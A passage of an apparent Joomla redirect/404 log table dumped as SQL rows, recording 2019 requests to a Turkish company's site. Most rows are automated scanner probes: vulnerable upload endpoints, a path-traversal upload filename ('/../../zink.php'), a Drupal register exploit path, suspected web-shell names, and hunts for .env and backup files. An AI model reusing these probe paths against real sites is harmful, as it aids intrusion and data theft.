00:00:00',301),(22582,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjslue386rhahxypj4khqalcag4mhawcfqweg&amp;usg=aovvaw3f7r3nomcp8s70xnmjq8jg//components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:45:47','0000-00-00 00:00:00',301),(22583,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjslue386rhahxypj4khqalcag4mhawcfqweg&amp;usg=aovvaw3f7r3nomcp8s70xnmjq8jg//administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:45:48','0000-00-00 00:00:00',301),(22584,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjslue386rhahxypj4khqalcag4mhawcfqweg&amp;usg=aovvaw3f7r3nomcp8s70xnmjq8jg/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:45:48','0000-00-00 00:00:00',301),(22585,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjslue386rhahxypj4khqalcag4mhawcfqweg&amp;usg=aovvaw3f7r3nomcp8s70xnmjq8jg//administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:45:49','0000-00-00 00:00:00',301),(22586,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjslue386rhahxypj4khqalcag4mhawcfqweg&amp;usg=aovvaw3f7r3nomcp8s70xnmjq8jg//components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:45:49','0000-00-00 00:00:00',301),(22587,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjslue386rhahxypj4khqalcag4mhawcfqweg&amp;usg=aovvaw3f7r3nomcp8s70xnmjq8jg//administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:45:50','0000-00-00 00:00:00',301),(22588,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjslue386rhahxypj4khqalcag4mhawcfqweg&amp;usg=aovvaw3f7r3nomcp8s70xnmjq8jg//components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:45:50','0000-00-00 00:00:00',301),(22589,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjslue386rhahxypj4khqalcag4mhawcfqweg&amp;usg=aovvaw3f7r3nomcp8s70xnmjq8jg//administrator/components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:45:51','0000-00-00 00:00:00',301),(22590,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjslue386rhahxypj4khqalcag4mhawcfqweg&amp;usg=aovvaw3f7r3nomcp8s70xnmjq8jg//components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:45:52','0000-00-00 00:00:00',301),(22591,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjslue386rhahxypj4khqalcag4mhawcfqweg&amp;usg=aovvaw3f7r3nomcp8s70xnmjq8jg//administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:45:52','0000-00-00 00:00:00',301),(22592,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjslue386rhahxypj4khqalcag4mhawcfqweg&amp;usg=aovvaw3f7r3nomcp8s70xnmjq8jg//components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:45:53','0000-00-00 00:00:00',301),(22593,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjslue386rhahxypj4khqalcag4mhawcfqweg&amp;usg=aovvaw3f7r3nomcp8s70xnmjq8jg//administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php',NULL,'','',1,0,'2019-03-30 23:45:54','0000-00-00 00:00:00',301),(22594,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjslue386rhahxypj4khqalcag4mhawcfqweg&amp;usg=aovvaw3f7r3nomcp8s70xnmjq8jg//wp-admin/admin-ajax.php',NULL,'','',3,0,'2019-03-30 23:45:55','0000-00-00 00:00:00',301),(22595,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjslue386rhahxypj4khqalcag4mhawcfqweg&amp;usg=aovvaw3f7r3nomcp8s70xnmjq8jg//index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1',NULL,'','',1,0,'2019-03-30 23:45:57','0000-00-00 00:00:00',301),(22596,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjslue386rhahxypj4khqalcag4mhawcfqweg&amp;usg=aovvaw3f7r3nomcp8s70xnmjq8jg//index.php?option=com_fabrik&format=raw&task=plugin.pluginajax&plugin=fileupload&method=ajax_upload',NULL,'','',1,0,'2019-03-30 23:45:58','0000-00-00 00:00:00',301),(22597,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjslue386rhahxypj4khqalcag4mhawcfqweg&amp;usg=aovvaw3f7r3nomcp8s70xnmjq8jg//index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&itemid=138&qqfile=/../../zink.php',NULL,'','',1,0,'2019-03-30 23:45:58','0000-00-00 00:00:00',301),(22598,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewjslue386rhahxypj4khqalcag4mhawcfqweg&amp;usg=aovvaw3f7r3nomcp8s70xnmjq8jg//index.php?option=com_b2jcontact&view=loader&owner=component&id={}&bid={}&root=&type=uploader&&owner=component&id={}&qqfile=586cfc73826e4-/../../zink.php',NULL,'','',1,0,'2019-03-30 23:45:59','0000-00-00 00:00:00',301),(22599,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewiktqa486rhahufoz4khsspaii4pbawcdmwca&amp;usg=aovvaw2ofxekoiorqqxpdjsmin_y//index.php?option=com_jdownloads&itemid=1&view=upload',NULL,'','',1,0,'2019-03-30 23:50:25','0000-00-00 00:00:00',301),(22600,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewiktqa486rhahufoz4khsspaii4pbawcdmwca&amp;usg=aovvaw2ofxekoiorqqxpdjsmin_y//components/com_creativecontactform/fileupload/index.php',NULL,'','',1,0,'2019-03-30 23:50:26','0000-00-00 00:00:00',301),(22601,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewiktqa486rhahufoz4khsspaii4pbawcdmwca&amp;usg=aovvaw2ofxekoiorqqxpdjsmin_y//components/com_sexycontactform/fileupload/index.php',NULL,'','',1,0,'2019-03-30 23:50:27','0000-00-00 00:00:00',301),(22602,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewiktqa486rhahufoz4khsspaii4pbawcdmwca&amp;usg=aovvaw2ofxekoiorqqxpdjsmin_y//index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',1,0,'2019-03-30 23:50:28','0000-00-00 00:00:00',301),(22603,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewiktqa486rhahufoz4khsspaii4pbawcdmwca&amp;usg=aovvaw2ofxekoiorqqxpdjsmin_y//administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:50:29','0000-00-00 00:00:00',301),(22604,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewiktqa486rhahufoz4khsspaii4pbawcdmwca&amp;usg=aovvaw2ofxekoiorqqxpdjsmin_y//components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:50:29','0000-00-00 00:00:00',301),(22605,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewiktqa486rhahufoz4khsspaii4pbawcdmwca&amp;usg=aovvaw2ofxekoiorqqxpdjsmin_y//administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:50:30','0000-00-00 00:00:00',301),(22606,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewiktqa486rhahufoz4khsspaii4pbawcdmwca&amp;usg=aovvaw2ofxekoiorqqxpdjsmin_y/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:50:30','0000-00-00 00:00:00',301),(22607,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewiktqa486rhahufoz4khsspaii4pbawcdmwca&amp;usg=aovvaw2ofxekoiorqqxpdjsmin_y//administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:50:31','0000-00-00 00:00:00',301),(22608,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewiktqa486rhahufoz4khsspaii4pbawcdmwca&amp;usg=aovvaw2ofxekoiorqqxpdjsmin_y//components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:50:31','0000-00-00 00:00:00',301),(22609,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewiktqa486rhahufoz4khsspaii4pbawcdmwca&amp;usg=aovvaw2ofxekoiorqqxpdjsmin_y//administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:50:32','0000-00-00 00:00:00',301),(22610,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewiktqa486rhahufoz4khsspaii4pbawcdmwca&amp;usg=aovvaw2ofxekoiorqqxpdjsmin_y//components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:50:33','0000-00-00 00:00:00',301),(22611,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewiktqa486rhahufoz4khsspaii4pbawcdmwca&amp;usg=aovvaw2ofxekoiorqqxpdjsmin_y//administrator/components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:50:33','0000-00-00 00:00:00',301),(22612,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewiktqa486rhahufoz4khsspaii4pbawcdmwca&amp;usg=aovvaw2ofxekoiorqqxpdjsmin_y//components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:50:34','0000-00-00 00:00:00',301),(22613,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewiktqa486rhahufoz4khsspaii4pbawcdmwca&amp;usg=aovvaw2ofxekoiorqqxpdjsmin_y//administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:50:34','0000-00-00 00:00:00',301),(22614,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewiktqa486rhahufoz4khsspaii4pbawcdmwca&amp;usg=aovvaw2ofxekoiorqqxpdjsmin_y//components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2019-03-30 23:50:35','0000-00-00 00:00:00',301),(22615,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewiktqa486rhahufoz4khsspaii4pbawcdmwca&amp;usg=aovvaw2ofxekoiorqqxpdjsmin_y//administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php',NULL,'','',1,0,'2019-03-30 23:50:35','0000-00-00 00:00:00',301),(22616,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewiktqa486rhahufoz4khsspaii4pbawcdmwca&amp;usg=aovvaw2ofxekoiorqqxpdjsmin_y//wp-admin/admin-ajax.php',NULL,'','',3,0,'2019-03-30 23:50:36','0000-00-00 00:00:00',301),(22617,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewiktqa486rhahufoz4khsspaii4pbawcdmwca&amp;usg=aovvaw2ofxekoiorqqxpdjsmin_y//index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1',NULL,'','',1,0,'2019-03-30 23:50:39','0000-00-00 00:00:00',301),(22618,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewiktqa486rhahufoz4khsspaii4pbawcdmwca&amp;usg=aovvaw2ofxekoiorqqxpdjsmin_y//index.php?option=com_fabrik&format=raw&task=plugin.pluginajax&plugin=fileupload&method=ajax_upload',NULL,'','',1,0,'2019-03-30 23:50:39','0000-00-00 00:00:00',301),(22619,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewiktqa486rhahufoz4khsspaii4pbawcdmwca&amp;usg=aovvaw2ofxekoiorqqxpdjsmin_y//index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&itemid=138&qqfile=/../../zink.php',NULL,'','',1,0,'2019-03-30 23:50:40','0000-00-00 00:00:00',301),(22620,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_mailto&tmpl=component&link=225d1e8b6eb62bc065da66b7914ec9d8aa9e90dd&lang=en&amp;sa=u&amp;ved=0ahukewiktqa486rhahufoz4khsspaii4pbawcdmwca&amp;usg=aovvaw2ofxekoiorqqxpdjsmin_y//index.php?option=com_b2jcontact&view=loader&owner=component&id={}&bid={}&root=&type=uploader&&owner=component&id={}&qqfile=586cfc73826e4-/../../zink.php',NULL,'','',1,0,'2019-03-30 23:50:41','0000-00-00 00:00:00',301),(22621,'http://www.3s-technologies.com.tr/tr/templates/beez5/favicon.ico',NULL,'','',1,0,'2019-03-31 03:06:52','0000-00-00 00:00:00',301),(22622,'http://www.3s-technologies.com.tr/tr/using-joomla/extensions/components/content-component/article-category-list?id=8&language=tr-tr',NULL,'','',31,0,'2019-03-31 03:25:38','0000-00-00 00:00:00',301),(22623,'http://3s-technologies.com.tr/tr/modules/mod_joomlaapi/apisystem.php',NULL,'','',1,0,'2019-03-31 23:52:52','0000-00-00 00:00:00',301),(22624,'http://3s-technologies.com.tr/tr/modules/mod_googlemapsapi/fm.php',NULL,'','',1,0,'2019-03-31 23:52:53','0000-00-00 00:00:00',301),(22625,'http://3s-technologies.com.tr/tr/administrator/dbapi.php',NULL,'','',1,0,'2019-03-31 23:52:53','0000-00-00 00:00:00',301),(22626,'http://3s-technologies.com.tr/tr/modules/mod_mapsgoogle/fm.php',NULL,'','',1,0,'2019-03-31 23:52:54','0000-00-00 00:00:00',301),(22627,'http://3s-technologies.com.tr/tr/libraries/joomla/application/component/view-base64.php',NULL,'','',1,0,'2019-03-31 23:52:54','0000-00-00 00:00:00',301),(22628,'http://3s-technologies.com.tr/tr/back.zip',NULL,'http://3s-technologies.com.tr/back.zip','',2,0,'2019-04-01 15:44:46','0000-00-00 00:00:00',301),(22629,'http://3s-technologies.com.tr/en//web/wp-includes/wlwmanifest.xml',NULL,'','',84,0,'2019-04-02 23:17:27','0000-00-00 00:00:00',301),(22630,'http://3s-technologies.com.tr/en//website/wp-includes/wlwmanifest.xml',NULL,'','',84,0,'2019-04-02 23:17:28','0000-00-00 00:00:00',301),(22631,'http://3s-technologies.com.tr/en//news/wp-includes/wlwmanifest.xml',NULL,'','',84,0,'2019-04-02 23:17:28','0000-00-00 00:00:00',301),(22632,'http://3s-technologies.com.tr/en//2015/wp-includes/wlwmanifest.xml',NULL,'','',9,0,'2019-04-02 23:17:28','0000-00-00 00:00:00',301),(22633,'http://3s-technologies.com.tr/en//2016/wp-includes/wlwmanifest.xml',NULL,'','',9,0,'2019-04-02 23:17:29','0000-00-00 00:00:00',301),(22634,'http://3s-technologies.com.tr/en//2017/wp-includes/wlwmanifest.xml',NULL,'','',9,0,'2019-04-02 23:17:29','0000-00-00 00:00:00',301),(22635,'http://3s-technologies.com.tr/en//2018/wp-includes/wlwmanifest.xml',NULL,'','',71,0,'2019-04-02 23:17:29','0000-00-00 00:00:00',301),(22636,'http://3s-technologies.com.tr/en//shop/wp-includes/wlwmanifest.xml',NULL,'','',78,0,'2019-04-02 23:17:29','0000-00-00 00:00:00',301),(22637,'http://3s-technologies.com.tr/en//wp1/wp-includes/wlwmanifest.xml',NULL,'','',84,0,'2019-04-02 23:17:29','0000-00-00 00:00:00',301),(22638,'http://3s-technologies.com.tr/en//test/wp-includes/wlwmanifest.xml',NULL,'','',84,0,'2019-04-02 23:17:29','0000-00-00 00:00:00',301),(22639,'http://3s-technologies.com.tr/en//media/wp-includes/wlwmanifest.xml',NULL,'','',71,0,'2019-04-02 23:17:30','0000-00-00 00:00:00',301),(22640,'http://3s-technologies.com.tr/en//wp2/wp-includes/wlwmanifest.xml',NULL,'','',84,0,'2019-04-02 23:17:30','0000-00-00 00:00:00',301),(22641,'http://3s-technologies.com.tr/en//sito/wp-includes/wlwmanifest.xml',NULL,'','',84,0,'2019-04-02 23:17:30','0000-00-00 00:00:00',301),(22642,'http://3s-technologies.com.tr/tr/backup.sql',NULL,'http://3s-technologies.com.tr/tr/backup.sql','',1,0,'2019-04-03 00:26:24','0000-00-00 00:00:00',301),(22643,'http://3s-technologies.com.tr/tr/backup.tar',NULL,'http://3s-technologies.com.tr/tr/backup.tar','',2,0,'2019-04-03 00:26:24','0000-00-00 00:00:00',301),(22644,'http://3s-technologies.com.tr/tr/backup.tar.gz',NULL,'http://3s-technologies.com.tr/tr/backup.tar.gz','',2,0,'2019-04-03 00:26:25','0000-00-00 00:00:00',301),(22645,'http://3s-technologies.com.tr/tr/admin.tar',NULL,'http://3s-technologies.com.tr/tr/admin.tar','',1,0,'2019-04-03 19:43:14','0000-00-00 00:00:00',301),(22646,'http://3s-technologies.com.tr/tr/admin.zip',NULL,'http://3s-technologies.com.tr/tr/admin.zip','',1,0,'2019-04-03 19:43:14','0000-00-00 00:00:00',301),(22647,'http://3s-technologies.com.tr/tr/admin.sql',NULL,'http://3s-technologies.com.tr/tr/admin.sql','',1,0,'2019-04-03 19:43:16','0000-00-00 00:00:00',301),(22648,'http://3s-technologies.com.tr/tr/admin.tar.gz',NULL,'http://3s-technologies.com.tr/tr/admin.tar.gz','',1,0,'2019-04-03 19:43:18','0000-00-00 00:00:00',301),(22649,'http://3s-technologies.com.tr/tr/sql.tar',NULL,'http://3s-technologies.com.tr/tr/sql.tar','',1,0,'2019-04-04 15:02:26','0000-00-00 00:00:00',301),(22650,'http://3s-technologies.com.tr/tr/sql.zip',NULL,'http://3s-technologies.com.tr/tr/sql.zip','',1,0,'2019-04-04 15:02:30','0000-00-00 00:00:00',301),(22651,'http://3s-technologies.com.tr/tr/sql.sql',NULL,'http://3s-technologies.com.tr/tr/sql.sql','',1,0,'2019-04-04 15:02:36','0000-00-00 00:00:00',301),(22652,'http://3s-technologies.com.tr/tr/sql.tar.gz',NULL,'http://3s-technologies.com.tr/tr/sql.tar.gz','',1,0,'2019-04-04 15:03:23','0000-00-00 00:00:00',301),(22653,'http://www.3s-technologies.com.tr/tr/dpltwrdoazagnh.html',NULL,'','',1,0,'2019-04-05 00:47:07','0000-00-00 00:00:00',301),(22654,'http://3s-technologies.com.tr/en/.env',NULL,'','',53,0,'2019-04-05 03:26:17','0000-00-00 00:00:00',301),(22655,'http://3s-technologies.com.tr/tr/upload.zip',NULL,'http://3s-technologies.com.tr/tr/upload.zip','',1,0,'2019-04-05 10:25:46','0000-00-00 00:00:00',301),(22656,'http://3s-technologies.com.tr/tr/upload.tar.gz',NULL,'http://3s-technologies.com.tr/tr/upload.tar.gz','',1,0,'2019-04-05 10:25:47','0000-00-00 00:00:00',301),(22657,'http://3s-technologies.com.tr/tr/upload.sql',NULL,'http://3s-technologies.com.tr/tr/upload.sql','',1,0,'2019-04-05 10:25:47','0000-00-00 00:00:00',301),(22658,'http://3s-technologies.com.tr/tr/upload.tar',NULL,'http://3s-technologies.com.tr/tr/upload.tar','',1,0,'2019-04-05 10:25:48','0000-00-00 00:00:00',301),(22659,'http://3s-technologies.com.tr/tr/xfmxotewwo.html',NULL,'','',1,0,'2019-04-06 04:00:02','0000-00-00 00:00:00',301),(22660,'http://mail.3s-technologies.com.tr/tr/webconfig.txt.php',NULL,'http://www.google.com.hk','',4,0,'2019-04-06 20:46:00','0000-00-00 00:00:00',301),(22661,'http://mail.3s-technologies.com.tr//user/register/?element_parents=account/mail/#value&ajax_form=1&_wrapper_format=drupal_ajax',NULL,'http://www.google.com.hk','',1,0,'2019-04-06 20:46:17','0000-00-00 00:00:00',301),(22662,'http://mail.3s-technologies.com.tr/tr/administrator/webconfig.txt.php',NULL,'http://www.google.com.hk','',1,0,'2019-04-06 20:47:14','0000-00-00 00:00:00',301),(22663,'https://mail.3s-technologies.com.tr/tr/webconfig.txt.php',NULL,'http://www.google.com.hk','',4,0,'2019-04-06 20:47:56','0000-00-00 00:00:00',301),(22664,'https://mail.3s-technologies.com.tr//user/register/?element_parents=account/mail/#value&ajax_form=1&_wrapper_format=drupal_ajax',NULL,'http://www.google.com.hk','',1,0,'2019-04-06 20:48:09','0000-00-00 00:00:00',301),(22665,'https://mail.3s-technologies.com.tr/tr/administrator/webconfig.txt.php',NULL,'http://www.google.com.hk','',1,0,'2019-04-06 20:48:55','0000-00-00 00:00:00',301),(22666,'http://www.3s-technologies.com.tr/tr/indexbak.php',NULL,'http://www.google.com.hk','',2,0,'2019-04-10 13:40:42','0000-00-00 00:00:00',301),(22667,'http://www.3s-technologies.com.tr/tr/administrator/indexbak.php',NULL,'http://www.google.com.hk','',1,0,'2019-04-10 13:46:54','0000-00-00 00:00:00',301),(22668,'http://www.3s-technologies.com.tr//administrator//user/register/?element_parents=account/mail/#value&ajax_form=1&_wrapper_format=drupal_ajax',NULL,'http://www.google.com.hk','',1,0,'2019-04-10 13:50:49','0000-00-00 00:00:00',301),(22669,'https://www.3s-technologies.com.tr/tr/indexbak.php',NULL,'http://www.google.com.hk','',2,0,'2019-04-10 13:54:32','0000-00-00 00:00:00',301),(22670,'https://www.3s-technologies.com.tr/tr/administrator/indexbak.php',NULL,'http://www.google.com.hk','',1,0,'2019-04-10 14:00:43','0000-00-00 00:00:00',301),(22671,'https://www.3s-technologies.com.tr//administrator//user/register/?element_parents=account/mail/#value&ajax_form=1&_wrapper_format=drupal_ajax',NULL,'http://www.google.com.hk','',1,0,'2019-04-10 14:04:38','0000-00-00 00:00:00',301),(22672,'https://mail.3s-technologies.com.tr/tr/robots.txt',NULL,'','',1309,0,'2019-04-11 03:21:47','0000-00-00 00:00:00',301),(22673,'https://www.3s-technologies.com.tr/en/dmb-elektronik.com/j3.2/index.php/component/users?view=register',NULL,'','',2,0,'2019-04-11 07:44:40','0000-00-00 00:00:00',301),(22674,'https://www.3s-technologies.com.tr/en/dmb-elektronik.com/j3.2/index.php/index.php?option=com_user&view=register',NULL,'','',2,0,'2019-04-11 07:45:12','0000-00-00 00:00:00',301),(22675,'http://www.3s-technologies.com.tr/tr/gfzmabrkertkxawm.html',NULL,'','',1,0,'2019-04-12 05:07:48','0000-00-00 00:00:00',301),(22676,'http://3s-technologies.com.tr/tr/plugins/content/apismtp/apismtp.php?test=hello',NULL,'','',28,0,'2019-04-12 06:32:49','0000-00-00 00:00:00',301),(22677,'http://3s-technologies.com.tr/tr/nwvrtbfmllo.html',NULL,'','',1,0,'2019-04-13 04:59:53','0000-00-00 00:00:00',301),(22678,'http://www.3s-technologies.com.tr/en/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload.js',NULL,'http://www.3s-technologies.com.tr/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload.js','',1,0,'2019-04-13 08:41:18','0000-00-00 